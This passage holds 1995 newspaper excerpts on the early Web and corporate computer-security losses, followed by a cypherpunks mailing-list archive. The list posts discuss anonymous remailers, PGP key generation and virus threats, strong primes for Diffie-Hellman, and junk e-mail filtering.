browser. Mosaic permitted access to information anywhere on
tke World Wide Web by letting the user point and click a
computer mouse on highlighted words or images on the screen.
The browser, which became available in commercial versions
like Netscape Communications' Navigator, not only made Web
sites easily accessible, it prompted businesses, organizations
and even individuals to create new Web sites by the thousands.

Thus did the Web quickly become a standard and accepted way
for the growing millions of the computer-literate to
communicate and to entertain and inform themselves. And unlike
each previous mass medium, the Web does not require its
audience to be merely passive recipients of information.

For very little money, and with a modicum of computer skills,
virtually anyone can create his or her own Web site. Anyone
with a modem is potentially a global pamphleteer.

One consequence of this democratization is that the Web can be
a remarkably anarchic forum compared with the old-style mass
media. "Think of this as television colliding with the
telephone party line," said Paul Saffo, a computer industry
consultant at the Institute for the Future, a Menlo Park,
Calif., research firm. "In terms of social consequences, the
Web is a great experiment. It's going to deliver us community
with a vengeance -- and we may find we don't want it."

-----

NYT, 11-20-95, Business Section.

Losses From Computer Breaches Are on the Rise, a Study Finds

By Peter H. Lewis

Financial losses from computer break-ins and other security
breaches are on the rise, according to a survey of corporate
computer-security managers, with nearly half of all companies
reporting losses as a result of hackers, viruses, sabotage,
corporate spies and incompetent employees.

At least 20 of the 1,290 companies responding to the annual
security survey from Information Week magazine and the
consulting firm Ernst & Young, reported losses of more than $1
million last year.

But the poll also found that companies were more aware of the
risks arising from growing reliance on computer networks, and
were taking stronger steps to protect their information
systems.

"There is definitely increased awareness on the part of senior
management," said Daniel White, national director of
information security at Ernst & Young's Chicago office. But
Mr. White said that despite increased vigilance by computer
security officers, the lack of security tools made it risky to
conduct electronic-document interchange and other sensitive
business operations on the Internet.

"Lots of organizations are using the Internet in a thoughtful
way for marketing and information dissemination," Mr. White
said. "But do I really want to use it" for an
electronic-document transaction? "Not yet."

Details of the survey, the third annual one, are in the Nov.
28 issue of Information Week, available this week.

Among other findings were that nearly 80 percent of companies
surveyed had at least one full-time information-security
officer, a slight increase from last year. Of those, 45
percent report directly to the corporation's chief information
officer, reflecting the growing recognition of the importance
of computer security, Mr. White said.

Nearly 70 percent of those responding said their companies had
sustained a serious virus attack in the last year, a sharp
rise from 54 percent two years ago.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 20 Nov 1995 23:12:12 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511201450.GAA11841@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix pgp. hash latent cut ek reorder";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ecafe    cpunk@remail.ecafe.org           --*+* *+* .-  3:47:29  99.20%
robo     robo@c2.org                      #** *##+  ##     1:57  99.04%
hacktic  remailer@utopia.hacktic.nl       *** ***+* **     9:23  98.98%
spook    remailer@valhalla.phoenix.net    ++* ** +* **    19:50  98.83%
wmono    wmono@valhalla.phoenix.net       ++* ***+*  *    12:53  98.69%
rmadillo remailer@armadillo.com           ++++++ ++ ++    36:16  98.69%
hroller  hroller@c2.org                        ##+  ##      :51  98.68%
mix      mixmaster@remail.obscura.com     ----+-+ + -   1:13:12  98.54%
flame    remailer@flame.alias.net         ***  * +*  *    17:08  98.26%
replay   remailer@replay.com              ++*       **     7:26  98.05%
portal   hfinney@shell.portal.com         *      +* ##     3:56  97.99%
vishnu   mixmaster@vishnu.alias.net        **+**  +  *    16:08  97.79%
bsu-cs   nowhere@bsu-cs.bsu.edu           #** *#-+*  #     3:17  97.03%
ideath   remailer@ideath.goldenbear.com   ------- -  -  6:03:13  95.95%
penet    anon@anon.penet.fi               -----..- -   11:16:54  95.74%
alumni   hal@alumni.caltech.edu           *+* +  ++  #     5:01  95.02%
ford     remailer@bi-node.zerberus.de     _ _-.-+ +++  17:34:27  92.75%
extropia remail@extropia.wimsey.com       -..-- -----   5:46:08  92.40%
c2       remail@c2.org                    +++  +  + +     53:15  91.60%
rahul    homer@rahul.net                  -**+*#++* *      8:22  97.99%
syrinx   syrinx@c2.org                    +-  ++        5:13:50  28.61%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 20 Nov 1995 23:51:31 +0800
To: Derek Atkins <klp@gold.tc.umn.edu>
Subject: Re: Good Enough?
Message-ID: <acd6488c0102100451b8@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 1:24 PM 11/14/95, Derek Atkins wrote:
>Hi.
>
>First, I must warn you that generating keys on behalf of users is in
>general a very bad thing to do.  Instead, you might want to provide a
>simple way for users to generate keys and get them certified.  The
>biggest problem is that there is not an easy way to get a good set of
>random numbers on a server platform.  On the other hand, users can get
>a great deal of randomness on their own client machines.  If they can
>run netscape, then they can run PGP.
....
I don't like to harp on this but you have stated the scenario so clearly,
that I ask:

If  the user cannot trust you to generate keys for him, why should
he trust the code that you provide to him? That code can have
errors like the old Netscape code except planted on purpose so
that the private key is guessable in 2^40 tries.

There are two answers, I think.
   The code is public and the user
   hopes that any flaws will be publicized.

The second is to use keyed information (not timing but character
information) to provide the random seed. That is the idea behind
my post a few weeks ago:
"Using deterministic programs to select private RSA keys"
Some may find that method less hazardous then trusting the culture
of publishing flaws in code.

I can forward that posting to anyone interested.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 20 Nov 1995 06:59:47 +0800
To: Andy Brown <asb@nexor.co.uk>
Subject: Re: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951116091316.19868C-100000@eagle.nexor.co.uk>
Message-ID: <Pine.SOL.3.91.951117123337.27369A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Andy Brown wrote:
> > Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
> > (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.
> As a matter of interest, how long did it take you to generate this, and
> with what hardware?  I left a 120Mhz Pentium searching for 15 hours
> overnight without any success (it managed to eliminate 10 candidate primes
> as not strong in that time). 

Well, I left it running for about 50 hours over last weekend without a hit. 
Then I restarted it on Monday night and got a hit in about 12 hours :-).
(I thought it has finished sooner but I looked again at the 'script(1)' 
output and it did take 12 hours).
It is sort of hard to tell how longs things would take, due to the hit or
miss nature of this kind of search for primes. This is on a SGI with a
200mhz R4400 which is about the same speed as a 120mhz pentium when using
my maths libraries.

I'm doing the 'pick' an odd random number 'p', sieve p and (p-1)/2 over
the first 2000 primes, adding in steps until a number passes the sieve.
For a generator of 2, p mod 24 == 11 should be true.

When it passes, then do Miller-Rabin tests on P and (P-1/2) enough times
to be happy that the number is probably a prime :-). 

I believe that there are improvement that I can put in there for the
initial search for candidate primes

The actuall numbers for the search are as follows, 
1057 numbers passed the 'strong prime sieve'. 
7 numbers passed the prime test 
1 number passed both the prime and strong prime test. 

I suspect the ratio of 132 cadidates for 'strong' prime testing for each
'prime' could be brought down quite a bit but since I only need strong
primes for DH parameters, I probably will not spend the time on improving
my initial sieve right now. 

eric

PS, I just 'found' another 2048 bit strong prime last friday night,
2929 numbers passed the 'strong prime sieve'.
29 numbers passed the prime test (101 candidates per hit)
1 number passed both the prime and strong prime test,
4h12m run time.
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Tue, 21 Nov 1995 01:44:38 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <9511201710.AA25590@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:47 PM 11/19/95 -0500, you wrote:
>
>  Is anyone else getting lots of junk e-mail lately? I'm getting all
>kinds of direct marketing crap to both of my main accounts and I haven't
>posted to usenet in months. 

   On a related note, Compuserve had a note on their system last week from
the sysop.  Their customers are receiving unwanted e-mail advertisements
from the Internet.  Compuserve sysops are attempting to block the spaming
but are finding it difficult because the advertiser is coming in via
different routes.  They are also attempting to stop them using the court
system.  

   The advertiser, according to the Compuserve sysop, threatened a
mail-bombing if Compuserve tried to block them!!!  This would be a just
cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
response". 

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 21 Nov 1995 10:35:53 +0800
To: cypherpunks@toad.com
Subject: HOR_mel
Message-ID: <199511201509.KAA03155@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-20-95. Washrag:


   "It's the Spam You Read That's Making Many Interneters
   Queasy."

      It's squarely at odds with Internet culture. And an on-
      line mass mailer is drafting a lawsuit against a
      spammer, advised by Stewart A. Baker, former general
      counsel to the NSA. Having taken plenty of flak on the
      Internet for defending a Clinton administration proposal
      on encryption, Baker is pleased to be working on an
      issue so dear to the heart of the 'Net community. "It's
      not every day that you come to the office humming a
      tune," Baker said. "But working on this case, I do."


   11-20-95. W$Joker:

   "Why Many Businesses Can't Keep Their Secrets."

      Personal computers are the biggest contributors to the
      security headaches of companies. "Computer technology
      has enhanced the control and power of the individual
      employee to a level that transcends what was customary
      in the traditional workplace." Many experts see a
      correlation between recent leaks and the decline in
      workers' loyalty to employers, falling job security and
      increased workloads. The media have played a part as
      well by becoming more aggressive over the past three
      decades about challenging institutions and exposing
      scandal. This makes it "more possible for an employee to
      have his 15 minutes of fame" by waving his boss's
      victorias.

      Just what suffices legally as a reasonable precaution in
      a frontier developing as rapidly as computer technology
      isn't clear yet. For instance, requiring passwords for
      access to a computer system, once considered a
      reasonable precaution, now isn't enough. That's why
      consultants are recommending periodic internal audits to
      test for computer-system penetration and compliance with
      documented security policies.


   2: HOR_mel  (14 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 20 Nov 1995 23:30:22 +0800
To: cypherpunks@toad.com
Subject: [noise] country domains
In-Reply-To: <199511201316.FAA09442@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511201055.A43418-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 20 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> I think the University of Calgary is actually in the .ca domain. 
> 
> It's a Canadian address.  Its just like your very own domain.  Your
> machine tesla is on uottawa.ca.  Your University of Ottawa address is not
> in .edu, but is in .ca. 

True, but as the folks with the export-controlled ftp sites can tell you, you
can pretty much register as anything. Eg. U of Toronto has .edu addresses 
and .ca's , some of my friends around here have .net addresses, and I 
assume anyone anywhere in the world can probably get something like, 
..com, .net, .org (.edu's strictly controlled, isn't it?). (I even
know someone in montreal whose company machine is in .se since he works 
for Ericson (sp?) or somesuch scandinavian company).

Which is another spit in ITAR's face, or which meant that Tim wasn't 
able to get PGPfone from MIT (the prog couldn't figure out if his .net
address was in the US) and had to get it off an illegal usenet post.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Danny Cox <dannyc@gmap.leeds.ac.uk>
Date: Mon, 20 Nov 1995 19:31:57 +0800
To: cypherpunks@toad.com
Subject: Re: Mbone seminar 21st Nov 16:15UTC: FIREWALLS AS A NETWORK SECURITY
Message-ID: <10778.9511201052@gmap.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Piete,

  I read variuos bits about using the MBone for conferences etc including 
this one, and I'd like to be able to listen to them.  Can you point me to
any tools which I can use to access it and give me some pointers as to how
to use them ?

  Thanks,
Danny Cox




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Tue, 21 Nov 1995 01:41:31 +0800
To: cypherpunks@toad.com
Subject: Re: remailer abuse
In-Reply-To: <199511200524.VAA00445@netscape.com>
Message-ID: <199511201708.LAA17184@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Corey Bridges <corey@netscape.com> said:

CB> If junk mail continues to bother people, it's only a matter of time
CB> until mail programs' filtering capabilities become much more
CB> sophisticated. (Of course, for all I know, there already ARE
CB> programs that do what I'm about to propose.) People can maintain a
CB> "do not accept from" list, containing every anonymous remailer
CB> they've ever heard about, or an "accept only from" list, containing
CB> just the people they wish to converse with.

	Well, it might not be luser-friendly, but procmail does that:

:0
* (^From|^Sender|^TO).*(junk|mail|list)
/dev/null

:0
* (^From|^Sender|^TO).*(send|me|mail|list)
wanted.mail

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 21 Nov 1995 04:15:25 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk Email"
Message-ID: <Pine.ULT.3.91.951120112600.17877G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


See http://www.valleynet.net/hypermail/html/

Hurry, they might turn it off.

ROTFL

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 21 Nov 1995 04:09:53 +0800
To: cypherpunks@toad.com
Subject: Virus attacks on PGP
Message-ID: <199511201945.LAA27486@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


PGP can be vulnerable to virus attacks.  (Similar attacks can be made on
other cipher systems.) These virus attacks can either be "Get the Key", or
"Subvert the System" attacks.  Schneier's "Rubber Hose" attack and a class
of attack which I will call "Black Bag" attacks are get the key attacks. 
With a black bag attack, victims do not know their keys have been stolen,
and so continue to use them.  (According to "The Puzzle Palace", NSA got
the FBI to perform black bag attacks on embassies in Washington DC.)  I
don't think subvert the system attacks have any parallel in classical
cryptography.


Get the Key Attacks

PGP has three keys: the secret key ring pass phrase, the secret RSA key,
and the IDEA key.  Getting any of them would constitute a successful
attack.

A virus that collects secret key rings and sends their contents somewhere,
either via UDP like messages or by dialing the modem late at night doesn't
seem to much harder to build than one that erases your hard disk.  If it
runs only once per machine, its chances of getting caught are fairly low. 
The standard IP error handling of "throw away the packet" means that it
probably won't be caught by firewalls.  It seems more likely that someone
will catch their computer making an unauthorized 800 number call.  This
attack would allow an opponent to use a brute force attack on the pass
phrase.

Getting the pass phrase or the IDEA key requires that the virus infect
something in the PGP environment.  The infection could be to PGP itself, or
to the operating system in which it runs.  (N.B. Since Mac and PC systems
have only one protection domain, all programs running in them are part of
the operating system for the sake of this analysis.)

Assuming PGP is infected, although similar arguments apply to the operating
system, the possible mechanisms of infection are many:

  A infected PGP binary is installed
  A virus modifies disk copies of PGP
  The OS's loader is infected to modify PGP as it is loaded
  The compiler or linker is infected to modify PGP.

Any of these forms of infection could send pass phrases, secret keys, or
IDEA keys out via IP or modem.


Subvert the System Attacks

The mechanisms of infection are similar to those of the get the key
attacks, but these attacks do not require that the virus send data outside
the machine.  Instead, these attacks act by reducing the size of one of the
three key spaces, making it vulnerable to brute force attacks.  For
example, if the OS provides a "random number" service, then limiting the
randomness of the numbers constitutes an attack.  Making RSA key generation
loosely connected to the date and time constitutes an attack.


Defenses

One standard defense in classical cryptography is to frequently change the
cipher keys.  The PGP web-of-trust makes changing keys difficult, and is
perhaps the weakest part of the overall protocol.

Standard defenses against viruses can help, but if the attacker is
determined and competent, then the virus will not be detected by virus
detection programs, and will not have bugs which cause noticeable ill
effects on infected machines.

Custom changes to things like random number utilities and the PGP code
itself may increase resistance by preventing some of these attacks from
identifying the modified code as its intended target.

Auditing code, preferably object code, can detect infection.  Having ALL
the source code available is almost a requirement here.

Maintaining a file of cryptographic hashs of the IDEA keys used and
checking for duplicates can detect subvert the system attacks on IDEA key
generation at the risk that the cryptographic hash is in fact invertible
and can be used to reveal the IDEA key.

Using operating systems which run in many small protection domains can
limit the opportunity for infection.  One such system I have been involved
with for over 20 years is described at the following WEB sites:
  http://www.cis.upenn.edu/~KeyKOS/
  http://www.webcom.com/agorics/allkey.html

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Tue, 21 Nov 1995 04:45:06 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511202005.MAA25006@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


The other anonymous poster was referring to Detweiler's
belief that cryptoanarchy was a budding Nazism as one
of his apparent motivations. After a little bit of 
amateur Detweiler study I can agree with this. 

His page at http://www.csn.net/~ldetweil/ has sections that
emphasize his concern about cryptoanarchy as a kind of
"neo-nazism". Thankfully the cryptoanarchist sentiments
on this list are much different than nazism in the way
it advocates complete disengagement from the political
process, something that tended to make the Nazist agenda
highly dangerous. Without that you just have a bunch of
subversive guerillas. Like gnats, irritating but irrelevant.

So as long as we stick with the non-political advocation,
and stay disorganized, and don't ever amount to anything
significant as far as visible political clout, I think
Detweiler is generally going to continue to leave us alone,
thank God.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Date: Tue, 21 Nov 1995 01:45:20 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: WRITTEN CODE
In-Reply-To: <199511201316.FAA09442@jobe.shell.portal.com>
Message-ID: <Pine.SOL.3.91.951120121240.18418A-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 20 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> On Sat, 18 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:
> 
> > Curious, where is uncg.edu? Your French name doesn't make me think you're 
> > in the States (as an .edu address might suggest, but then not necessarily 
> > either). (univ of Calgary?)                                           

    uncg.edu is in North Carolina.  uncg stands for University of North
    Carolina at Greensboro.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 21 Nov 1995 03:13:03 +0800
To: Chris Claborne <Chris.Claborne@sandiegoca.attgis.com>
Subject: Re: "Junk E-Mail"
In-Reply-To: <9511201710.AA25590@toad.com>
Message-ID: <9511201851.AA28000@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>   The advertiser, according to the Compuserve sysop, threatened a
>mail-bombing if Compuserve tried to block them!!!  This would be a just
>cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
>response". 

I think it would be better to slap a RICO suit onto the company concerned.
It sound to me like an attempt to gain financial advantage through threatening 
behaviour. Where I come from that means jail time.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 21 Nov 1995 07:38:23 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity and Intellectual Capital
Message-ID: <199511202231.OAA11611@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The analogy between corporations protecting physical capital and
anonymity protecting intellectual capital is interesting, and I will
write a bit about it here.  I don't think it quite works in all ways but
it does suggest some ideas.

Capital, as I use the word, means stuff which helps you be productive.
Money can be physical capital, as can machines, computers, and so on,
but generally not consumer goods.  Traditionally, intellectual capital
by the same definition refers to training, knowledge, experience,
education - those mental skills and characteristics which help you
produce.  We have sometimes extended this notion here to reputation
capital, which we often use just to mean your reputation itself, your
good name.  But if we are going to call it "capital" it should really
be those aspects of your reputation which lead to productivity.  To the
extent that your good reputation helps you accomplish your productive
goals, it can be considered capital.  Particularly if you are a manager
or performer in some other position where people's opinions of you make
a big difference in how much you get done, you have a lot of reputation
capital.  Business reputations have many of the characteristics of
capital, too.

For some uses of anonymity it does make sense to think of them as
protecting reputation capital.  If you are going to send a message which
carries a risk of harming your reputation, perhaps because it is terribly
stupid or harsh, then anonymity can protect you in that way.  I think
some people do communicate anonymously for this reason.  However there is
another motivation, too, and that is fear of physical consequences.  Some
anonymous messages might lead to lawsuits or retribution in other forms,
such as firing or blackballing.  There is more involved in these cases
than just loss of reputation capital.  Physical capital is involved as
well.  So this is one way in which I think the analogy does not work.

Another difference relates to the number of people involved.  As I
understand it, the motivation for the corporate veil of immunity from
liability is so that people can safely band together in business.  If
there were no veil, and one harmful act by a member of the corporation
could result in any stockholder being held liable, then few people would
be willing to commit their assets to such an activity.  The risk would be
too great.  The point is that this protection is oriented towards
protecting large numbers of people.  It does not make much sense for a
single person to incorporate in order to try to protect himself from his
own harmful acts, and in fact I understand that the veil can often be
easily pierced in such situations.

On the other hand, with anonymity we are generally dealing with single
individuals.  There is no apparent need for people to pool reputation
capital in an endeavor, and have it be protected by the use of
anonymity.  The closest I can think of would be for a bunch of highly
regarded individuals to announce that they were going to join together
and create commentaries which would demonstrate all the insight, wit,
and other traits which gave these people such a high reputation in the
first place, but that the resulting missives would be released
anonymously, so that if one of them ended up reflecting badly on the
writers, there would be no way to know who had actually created it (it
could be a fake created by an imitator).

While I can't rule this out, it doesn't seem like a likely scenario, and
it doesn't seem to offer the opportunities that corporations do for
increasing productivity.

Another issue is the different forms of anonymity, which don't have clear
analogies with physical capital.  Using a pseudonym you can build up
reputation capital (or at least reputation) in the nym, but then you no
longer have immunity from harm if it commits some gaffe.  (Actually I
suppose this is not too different from the corporation whose assets can
be attacked but not those of the shareholders.)

Then there are the limited pseudonyms discussed by David Chaum, where
there are limits in how many pseudonyms of a particular type a person
can create.  You could have one "committed" pseudonym, unlinkable to
your True Name, which you post under; but you'd only get that one.
(You could post under other pseudonyms but they wouldn't be able to get
that "committed" stamp.) You'd have to be pretty careful what you say
via that nym, much as you are today with your True Name (which BTW a
lot of people don't realize yet).  Then people could filter so they
only received messages from committed nyms, figuring that senders would
be more likely to put meaningful content into these kinds of messages.

Chaum's system of credentials also could allow you to transfer
endorsements from one pseudonym to another.  We have discussed the idea
that such endorsements could be considered an embodiment of reputation
capital.  You could post a wide range of messages under different
pseudonyms, collect the positive endorsements (and discard the negative
ones), and attach them to your True Name or committed nym.  This might
encourage people to abandon their natural caution in making postings
which will come back to haunt them years hence (again, this will be more
an issue once people realize that this will happen).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Tue, 21 Nov 1995 07:50:38 +0800
To: cypherpunks@toad.com
Subject: Remailer list or FAQ?
Message-ID: <Pine.SUN.3.90.951120143929.25327D-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there a FAQ or other list of anonymous remailers?  Or how to use the 
one at portal.com (I had this info somewhere, but it takes forever to do 
a zgrep `find...).

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Tue, 21 Nov 1995 07:44:18 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <199511201945.LAA27486@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.90.951120144320.25327E-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the post.  I think there are a few interesting points, and 
some of the things I do to try to make things more difficult for a 
potential virus.

First, my secring is on a PCMCIA memory card, as is the versions of PGP, 
in this case DOS and Linux.  A virus is unlikely to attack both, and when 
the memory card is in, the network and modem cards are out.

Second, I think PGP is statically linked by default.  If it isn't this 
shoudl be changed - there was recently a CERT alert about telnet services 
being compromised by switching DLLs.  The code can also be cross compiled 
and burned onto a CDROM which would make it difficult to infect.

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Tue, 21 Nov 1995 07:43:42 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <199511202259.OAA11521@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hm. Well, if you think spamming us will help convince the gov't to export
strong crypto, go crazy. (Heck, I don't mind--it makes my job more secure.)

And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
scrolling for the last 3 hours.

Corey Bridges
Security Scribe
Netscape Communications Corporation
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Dittrich <dittrich@cac.washington.edu>
Date: Tue, 21 Nov 1995 07:44:26 +0800
To: cypherpunks@toad.com
Subject: (cpx) Re: "Junk E-Mail"
Message-ID: <9511202303.AA23192@red3.cac.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


> At 06:47 PM 11/19/95 -0500, you wrote:
> >
> >  Is anyone else getting lots of junk e-mail lately? I'm getting all
> >kinds of direct marketing crap to both of my main accounts and I haven't
> >posted to usenet in months.
> 
>    On a related note, Compuserve had a note on their system last week from
> the sysop.  Their customers are receiving unwanted e-mail advertisements
